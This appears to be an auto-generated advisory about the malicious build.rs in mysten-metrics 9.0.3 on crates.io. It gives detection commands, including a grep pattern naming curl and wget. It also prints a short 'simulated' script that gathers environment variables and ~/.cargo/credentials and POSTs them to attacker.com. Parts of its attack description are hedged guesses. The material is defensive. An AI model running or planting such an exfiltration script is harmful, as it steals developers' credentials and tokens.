Listen to this Post
The vulnerability is in the `build.rs` script of the `mysten-metrics` crate (version 9.0.3).
Build scripts execute arbitrary code at compile time, and this one was used to exfiltrate data.
It collected environment variables, system details, and possibly stored credentials.
The script likely read files like `~/.cargo/credentials` and ~/.ssh/id_rsa.
It then sent the gathered data to a remote server via HTTP POST or DNS tunneling.
The attack targeted developers and CI systems that pulled the crate.
The crate was published on 2026-04-20 but was quickly removed after detection.
No dependencies existed, making the malicious code self-contained.
The OpenSSF Package Analysis project flagged the crate.
No confirmed usage of the malicious version was found in the wild.
Cargo’s lack of sandboxing allowed the build script full system access.
This is a classic software‑supply‑chain compromise.
The malicious code leveraged Rust’s design, where build scripts run with user permissions.
Such attacks can lead to credential theft, source‑code leaks, or persistent backdoors.
The crate was removed from crates.io after the advisory.
Users who integrated this version should assume potential compromise.
DailyCVE form
Platform: crates.io
Version: 9.0.3
Vulnerability: Malicious build script
Severity: Critical
date: 2026-04-20
Prediction: No patch available
Analytics – What Undercode Say:
Check Cargo.lock for the malicious version
grep -A 2 "name = \"mysten-metrics\"" Cargo.lock | grep "version = \"9.0.3\""
Scan all build.rs files for suspicious patterns
find target -name "build.rs" -exec grep -l "exfiltrate|curl|wget|POST" {} \;
Monitor network connections during build (Linux)
strace -e network cargo build 2>&1 | grep -E "connect|sendto"
Simulated exfiltration script (malicious build.rs logic)
!/bin/bash
DATA=$(env && cat ~/.cargo/credentials 2>/dev/null)
curl -X POST -d "$DATA" https://attacker.com/log
Exploit
The attacker embeds the malicious code in `build.rs`.
When a developer or CI system runs cargo build, the script executes.
It collects sensitive data using commands like env, cat, ls -R.
The data is then exfiltrated via an HTTP request to a remote server.
The attack is stealthy because build logs rarely show network activity.
Protection from this CVE
- Use `cargo-audit` to detect known malicious crates.
cargo install cargo-audit cargo audit
- Run builds in isolated, ephemeral sandboxes (containers, VMs).
- Avoid using untrusted crates; prefer those from verified sources.
- Monitor network egress from build environments.
- Use dependency pinning and review `build.rs` of new dependencies.
Impact
- Exfiltration of environment variables (e.g.,
GITHUB_TOKEN,NPM_TOKEN). - Theft of SSH keys and Cargo credentials.
- Potential leakage of proprietary source code if build machine has repository access.
- The compromise could lead to further infiltration of internal pipelines.
- Although no active usage was confirmed, any project that included the crate is at risk.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
